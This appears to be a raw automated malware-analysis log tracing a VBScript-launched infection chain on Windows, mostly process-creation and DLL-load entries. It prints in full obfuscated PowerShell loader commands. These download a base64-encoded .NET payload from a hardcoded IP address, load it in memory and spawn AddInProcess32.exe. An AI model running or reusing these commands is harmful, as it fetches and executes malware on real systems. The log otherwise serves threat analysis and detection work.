                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /cJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat textJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
